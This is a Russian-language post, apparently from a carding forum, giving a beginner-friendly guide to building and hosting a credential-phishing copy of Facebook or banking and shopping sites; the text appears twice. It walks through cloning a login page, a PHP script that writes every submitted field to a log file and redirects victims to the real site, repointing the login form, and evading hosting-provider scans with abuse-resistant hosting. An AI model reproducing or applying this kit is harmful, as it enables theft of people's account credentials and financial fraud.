Дорогие кардеры, в последнее время мы получаем много сообщений, в которых задают кучу вопросов по широкому кругу категорий, хотя мы делаем все возможное, чтобы удовлетворить вас, мы почти не можем угодить всем! Сказав это, сегодня мы решили вооружить вас знаниями, чтобы создать в 2021 году свои собственные фишинговые / мошеннические страницы, удобные для новичков.
Мы столкнулись с множеством вопросов о создании фишинговых страниц.
Те, кто провел собственное исследование по этой теме, заметят, что принципы, лежащие в основе каждого руководства, в чем-то схожи, большинство решений для хостинга, представленных в других руководствах, больше не работают из-за увеличения количества атак на фишинговые страницы со стороны хостинговых компаний. ненавижу или люблю это…. Что есть, то есть!
В этом руководстве мы рассмотрим каждый шаг, необходимый для создания и размещения фишинг-страницы по вашему выбору, и она будет удобна для новичков, и те, кто никогда не размещал фишинговую / мошенническую страницу, смогут понять и создать свою собственную.
Прежде чем перейти к # шагу 1, убедитесь, что у вас есть редактор кода, и самый простой из используемых нами - блокнот ++, вы можете скачать его БЕСПЛАТНО, перейдя по этой ссылке https://notepad-plus-plus.org/
Итак, теперь, когда вы скачали редактор кода, давайте приступим к делу, ладно?
№1. СКАЧАТЬ ИНДЕКС HTML
Для начала вам необходимо получить HTML-индекс страницы, с которой вы собираетесь начать.
Существуют различные способы сделать это, есть даже онлайн-шаблоны для популярных сайтов, но все они стоят немного, и те из вас, кто разорены, придут к нам с жалобами, почему в нашем руководстве есть что-то, что требует предварительной оплаты, хотя это не всегда Можно заработать деньги, ничего не вкладывая заранее, но у нас есть несколько БЕСПЛАТНЫХ вариантов, чтобы обойти этот конкретный.
Итак, в первую очередь мы будем использовать самый простой способ, чтобы быть максимально дружелюбными для новичков.
Итак, мы собираемся использовать Facebook на протяжении всего этого руководства, поэтому, прежде чем вы спросите: «Могу ли я использовать Gmail, MS360, YouTube, Chase Bank, Bank of America, Amazon, BestBuy, Ebay или PayPal» ответ - ДА! Вы можете использовать ЛЮБУЮ страницу, пока вы можете открыть эту страницу на своем компьютере, вы можете использовать эту страницу для фишинга / спама.
№2. ИСХОДНЫЙ КОД СТРАНИЦЫ
Теперь в зависимости от вашего браузера могут быть разные методы. Обычно для этого нужно щелкнуть сайт правой кнопкой мыши и выбрать «Проверить» или «Проверить элемент». Затем вы нажимаете «(индекс)».
№3. СОХРАНЕНИЕ ИСХОДНОГО КОДА
Выберите источник, который вы видите, нажав «Ctrl + A», и скопируйте и вставьте все, что вы видите в поле, откройте свой блокнот ++, который вы скачали ранее, чтобы вставить все это туда.
Используйте Notepad ++ в Windows и простую программу для редактирования текста для тех, кто не использует Windows. (Не используйте другие программы).
После того, как код будет вставлен в ваш блокнот ++, нажмите «Сохранить как» или любой другой вариант, позволяющий сохранить этот документ.
Вы сохраните этот файл на своем «рабочем столе», чтобы его было легче найти и обработать.
В поле «Имя файла» назовите документ «index.html», явно без кавычек.
Измените «Тип файла» на следующее:
«Язык гипертекстовой разметки (* html; *. Htm; *. Shtml; *. Shtm; *. Xhtml; *. Xht; *. Hta)».
Поздравляю! Вы закончили первый шаг урока!
Итак, теперь вы можете перейти на рабочий стол и открыть только что сохраненный файл index.html.
Боковое примечание: если страница выглядит плохо, это просто означает, что на сайте есть всевозможные файлы, которые вам понадобятся для правильного отображения, но не волнуйтесь, мы вам поможем.
Перейдите на страницу «HTTRACK», чтобы загрузить бесплатную программу. он решит все ваши проблемы и предоставит вам веб-сайт, идеально отображающийся в папке, все готово!
Сайт: https://www.httrack.com/
Страница загрузки: https://www.httrack.com/page/2/en/index.html
Предполагая, что у вас есть отсортированная часть сайта, теперь пришло время немного технических вопросов, не волнуйтесь, у вас есть carder.market на вашей стороне, чтобы сопровождать вас на каждом этапе на этом пути!
№4. ФАЙЛ PHP ДЛЯ СБОРКИ ПАРОЛЕЙ
Этот файл PHP, который вы создадите следующим, будет служить инструментом для сбора пароля пользователя. Опять же, есть несколько способов создать этот файл PHP, если у вас есть некоторые знания в области программирования, но если вы не волнуетесь, просто скопируйте наш пример PHP ниже в свой блокнот ++.
Очевидно, что во второй строке вы измените «URL-адрес местоположения» в соответствии с URL-адресом сайта, который вы фишируете / рассылаете спамом.
Имя файла должно быть «post.php».
Тип файла "Сохранить как" должен быть следующим:
«Файл препроцессора гипертекста PHP (* .php; *. Php3; *. Php4; *. Php5; *. Phps; *. Phpt; *. Phtml)»
№5. Включение HTML с файлом пароля PHP
Теперь пришло время изменить HTML-файл, чтобы включить в него ваш PHP-файл, чтобы получать пароли, которые вводят пользователи.
Итак, давайте посмотрим, как работает веб-сайт, когда пользователь отправляет имя пользователя и пароль. Для Facebook все, что вам нужно сделать, это нажать Ctrl-F и ввести «action=» в поле. Теперь вам нужно заменить все в подчеркнутой части на «post.php», сохранив кавычки. (пожалуйста, только один комплект). Очевидно, что для других сайтов этот метод будет другим. Хороший способ найти его - использовать инструмент Inspect Elements в большинстве современных браузеров и нажать кнопку входа в систему. Найдите что-то похожее на метод выше. Боковое примечание: вам нужно будет изменить это позже, когда вы действительно разместите веб-сайт.
№6. ФАЙЛ PHP ДЛЯ ХРАНЕНИЯ ПАРОЛЕЙ
А теперь самое интересное - сделать ваш сайт для фишинга / рассылки спама онлайн, чтобы другие люди могли его просматривать.
Вы можете использовать любые достойные услуги хостинга для размещения и хранения паролей. В этом руководстве мы будем использовать HostGator.
Предположим, что вы уже создали веб-сайт на своем хостинге.
Для HostGator просто нажмите «Диспетчер файлов» и нажмите «Загрузить файлы».
Вам нужно просто загрузить его в основную папку вашей корневой папки.
Затем вы загрузите свои «Файлы PHP» и «Изменить разрешение».
Теперь вам нужно изменить разрешение на «777», что означает практически каждое разрешение. Когда будет предложено установить флажки для разрешений, просто отметьте каждое из них. Запишите свой веб-адрес!
№7. РАЗМЕЩЕНИЕ СТРАНИЦЫ ФИШИНГА / СПАМА
Для этого шага вам нужно будет найти собственного хостинг-провайдера, который вы будете использовать, иначе вас забанят.
Есть причина, по которой мы не используем HostGator в качестве нашего хостинг-провайдера для наших реальных страниц, и это потому, что большинство хостинг-провайдеров используют автоматическое сканирование для обнаружения фишинговых страниц, которые они затем запрещают после проверки. В прошлом мы экспериментировали с более чем 50 услугами хостинга, прежде чем найти подходящий. Вы можете провести собственное исследование на чёрных форумах или воспользоваться услугами абузоустойчивого хостинга. Когда мы экспериментировали с хостинг-провайдерами, большинство из них забанили нас в течение 1 часа после загрузки индексного файла.
Давайте продвинемся вперед, настроив форум post.php. Теперь, прежде чем размещать веб-сайт, помните, что мы настроили выше post.php / форма входа?
Вам нужно снова найти форму входа в систему в вашем index.html и заменить «post.php» на «https: //yourwebsiteforyourpostphpupload/post.php», предполагая, что вы загрузили в корневую папку. Не забудьте добавить «https://» перед сайтом (получите БЕСПЛАТНЫЙ сертификат SSL для скриптов). Чтобы проверить это, перейдите на веб-сайт (http: //yourwebsiteforyourpostphpupload/post.php) и посмотрите, перенаправляет ли он вас на Facebook.com, если это так, то вы вставили правильный сайт. Однако; если нет, дважды проверьте, загрузили ли вы файл в правильный каталог.
Размещение фактической страницы Перейдите на htmlpasta.com.
Затем вам нужно скопировать файл index.html для вашего фишингового сайта и вставить его туда.
Теперь нажмите reCAPTCHA и нажмите «Вставить», вы получите ссылку на свой веб-сайт.
ПОЗДРАВЛЯЕМ!
Вы завершили хостинг своего первого фишингового / спам-сайта!
Перейдите на свой сайт и попробуйте ввести поддельные данные для входа, после того как вы нажмете кнопку входа, он должен перенаправить вас на facebook.com.
Войдите на свой FTP-сервер, на котором размещен ваш файл post.php, и там должен быть новый документ с именем Log.txt, который хранится в той же папке, что и ваш файл post.php, поскольку все данные для входа должны храниться там.[/B]
Мы столкнулись с множеством вопросов о создании фишинговых страниц.
Те, кто провел собственное исследование по этой теме, заметят, что принципы, лежащие в основе каждого руководства, в чем-то схожи, большинство решений для хостинга, представленных в других руководствах, больше не работают из-за увеличения количества атак на фишинговые страницы со стороны хостинговых компаний. ненавижу или люблю это…. Что есть, то есть!
В этом руководстве мы рассмотрим каждый шаг, необходимый для создания и размещения фишинг-страницы по вашему выбору, и она будет удобна для новичков, и те, кто никогда не размещал фишинговую / мошенническую страницу, смогут понять и создать свою собственную.
Прежде чем перейти к # шагу 1, убедитесь, что у вас есть редактор кода, и самый простой из используемых нами - блокнот ++, вы можете скачать его БЕСПЛАТНО, перейдя по этой ссылке https://notepad-plus-plus.org/
Итак, теперь, когда вы скачали редактор кода, давайте приступим к делу, ладно?
№1. СКАЧАТЬ ИНДЕКС HTML
Для начала вам необходимо получить HTML-индекс страницы, с которой вы собираетесь начать.
Существуют различные способы сделать это, есть даже онлайн-шаблоны для популярных сайтов, но все они стоят немного, и те из вас, кто разорены, придут к нам с жалобами, почему в нашем руководстве есть что-то, что требует предварительной оплаты, хотя это не всегда Можно заработать деньги, ничего не вкладывая заранее, но у нас есть несколько БЕСПЛАТНЫХ вариантов, чтобы обойти этот конкретный.
Итак, в первую очередь мы будем использовать самый простой способ, чтобы быть максимально дружелюбными для новичков.
Итак, мы собираемся использовать Facebook на протяжении всего этого руководства, поэтому, прежде чем вы спросите: «Могу ли я использовать Gmail, MS360, YouTube, Chase Bank, Bank of America, Amazon, BestBuy, Ebay или PayPal» ответ - ДА! Вы можете использовать ЛЮБУЮ страницу, пока вы можете открыть эту страницу на своем компьютере, вы можете использовать эту страницу для фишинга / спама.
№2. ИСХОДНЫЙ КОД СТРАНИЦЫ
Теперь в зависимости от вашего браузера могут быть разные методы. Обычно для этого нужно щелкнуть сайт правой кнопкой мыши и выбрать «Проверить» или «Проверить элемент». Затем вы нажимаете «(индекс)».
№3. СОХРАНЕНИЕ ИСХОДНОГО КОДА
Выберите источник, который вы видите, нажав «Ctrl + A», и скопируйте и вставьте все, что вы видите в поле, откройте свой блокнот ++, который вы скачали ранее, чтобы вставить все это туда.
Используйте Notepad ++ в Windows и простую программу для редактирования текста для тех, кто не использует Windows. (Не используйте другие программы).
После того, как код будет вставлен в ваш блокнот ++, нажмите «Сохранить как» или любой другой вариант, позволяющий сохранить этот документ.
Вы сохраните этот файл на своем «рабочем столе», чтобы его было легче найти и обработать.
В поле «Имя файла» назовите документ «index.html», явно без кавычек.
Измените «Тип файла» на следующее:
«Язык гипертекстовой разметки (* html; *. Htm; *. Shtml; *. Shtm; *. Xhtml; *. Xht; *. Hta)».
Поздравляю! Вы закончили первый шаг урока!
Итак, теперь вы можете перейти на рабочий стол и открыть только что сохраненный файл index.html.
Боковое примечание: если страница выглядит плохо, это просто означает, что на сайте есть всевозможные файлы, которые вам понадобятся для правильного отображения, но не волнуйтесь, мы вам поможем.
Перейдите на страницу «HTTRACK», чтобы загрузить бесплатную программу. он решит все ваши проблемы и предоставит вам веб-сайт, идеально отображающийся в папке, все готово!
Сайт: https://www.httrack.com/
Страница загрузки: https://www.httrack.com/page/2/en/index.html
Предполагая, что у вас есть отсортированная часть сайта, теперь пришло время немного технических вопросов, не волнуйтесь, у вас есть carder.market на вашей стороне, чтобы сопровождать вас на каждом этапе на этом пути!
№4. ФАЙЛ PHP ДЛЯ СБОРКИ ПАРОЛЕЙ
Этот файл PHP, который вы создадите следующим, будет служить инструментом для сбора пароля пользователя. Опять же, есть несколько способов создать этот файл PHP, если у вас есть некоторые знания в области программирования, но если вы не волнуетесь, просто скопируйте наш пример PHP ниже в свой блокнот ++.
Code:
<?php
header (‘Location: facebook.com’);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n\n\n\n”);
fclose($handle);
exit;
?>Очевидно, что во второй строке вы измените «URL-адрес местоположения» в соответствии с URL-адресом сайта, который вы фишируете / рассылаете спамом.
Имя файла должно быть «post.php».
Тип файла "Сохранить как" должен быть следующим:
«Файл препроцессора гипертекста PHP (* .php; *. Php3; *. Php4; *. Php5; *. Phps; *. Phpt; *. Phtml)»
№5. Включение HTML с файлом пароля PHP
Теперь пришло время изменить HTML-файл, чтобы включить в него ваш PHP-файл, чтобы получать пароли, которые вводят пользователи.
Итак, давайте посмотрим, как работает веб-сайт, когда пользователь отправляет имя пользователя и пароль. Для Facebook все, что вам нужно сделать, это нажать Ctrl-F и ввести «action=» в поле. Теперь вам нужно заменить все в подчеркнутой части на «post.php», сохранив кавычки. (пожалуйста, только один комплект). Очевидно, что для других сайтов этот метод будет другим. Хороший способ найти его - использовать инструмент Inspect Elements в большинстве современных браузеров и нажать кнопку входа в систему. Найдите что-то похожее на метод выше. Боковое примечание: вам нужно будет изменить это позже, когда вы действительно разместите веб-сайт.
№6. ФАЙЛ PHP ДЛЯ ХРАНЕНИЯ ПАРОЛЕЙ
А теперь самое интересное - сделать ваш сайт для фишинга / рассылки спама онлайн, чтобы другие люди могли его просматривать.
Вы можете использовать любые достойные услуги хостинга для размещения и хранения паролей. В этом руководстве мы будем использовать HostGator.
Предположим, что вы уже создали веб-сайт на своем хостинге.
Для HostGator просто нажмите «Диспетчер файлов» и нажмите «Загрузить файлы».
Вам нужно просто загрузить его в основную папку вашей корневой папки.
Затем вы загрузите свои «Файлы PHP» и «Изменить разрешение».
Теперь вам нужно изменить разрешение на «777», что означает практически каждое разрешение. Когда будет предложено установить флажки для разрешений, просто отметьте каждое из них. Запишите свой веб-адрес!
№7. РАЗМЕЩЕНИЕ СТРАНИЦЫ ФИШИНГА / СПАМА
Для этого шага вам нужно будет найти собственного хостинг-провайдера, который вы будете использовать, иначе вас забанят.
Есть причина, по которой мы не используем HostGator в качестве нашего хостинг-провайдера для наших реальных страниц, и это потому, что большинство хостинг-провайдеров используют автоматическое сканирование для обнаружения фишинговых страниц, которые они затем запрещают после проверки. В прошлом мы экспериментировали с более чем 50 услугами хостинга, прежде чем найти подходящий. Вы можете провести собственное исследование на чёрных форумах или воспользоваться услугами абузоустойчивого хостинга. Когда мы экспериментировали с хостинг-провайдерами, большинство из них забанили нас в течение 1 часа после загрузки индексного файла.
Давайте продвинемся вперед, настроив форум post.php. Теперь, прежде чем размещать веб-сайт, помните, что мы настроили выше post.php / форма входа?
Вам нужно снова найти форму входа в систему в вашем index.html и заменить «post.php» на «https: //yourwebsiteforyourpostphpupload/post.php», предполагая, что вы загрузили в корневую папку. Не забудьте добавить «https://» перед сайтом (получите БЕСПЛАТНЫЙ сертификат SSL для скриптов). Чтобы проверить это, перейдите на веб-сайт (http: //yourwebsiteforyourpostphpupload/post.php) и посмотрите, перенаправляет ли он вас на Facebook.com, если это так, то вы вставили правильный сайт. Однако; если нет, дважды проверьте, загрузили ли вы файл в правильный каталог.
Размещение фактической страницы Перейдите на htmlpasta.com.
Затем вам нужно скопировать файл index.html для вашего фишингового сайта и вставить его туда.
Теперь нажмите reCAPTCHA и нажмите «Вставить», вы получите ссылку на свой веб-сайт.
ПОЗДРАВЛЯЕМ!
Вы завершили хостинг своего первого фишингового / спам-сайта!
Перейдите на свой сайт и попробуйте ввести поддельные данные для входа, после того как вы нажмете кнопку входа, он должен перенаправить вас на facebook.com.
Войдите на свой FTP-сервер, на котором размещен ваш файл post.php, и там должен быть новый документ с именем Log.txt, который хранится в той же папке, что и ваш файл post.php, поскольку все данные для входа должны храниться там.[/B]
Last edited by a moderator:
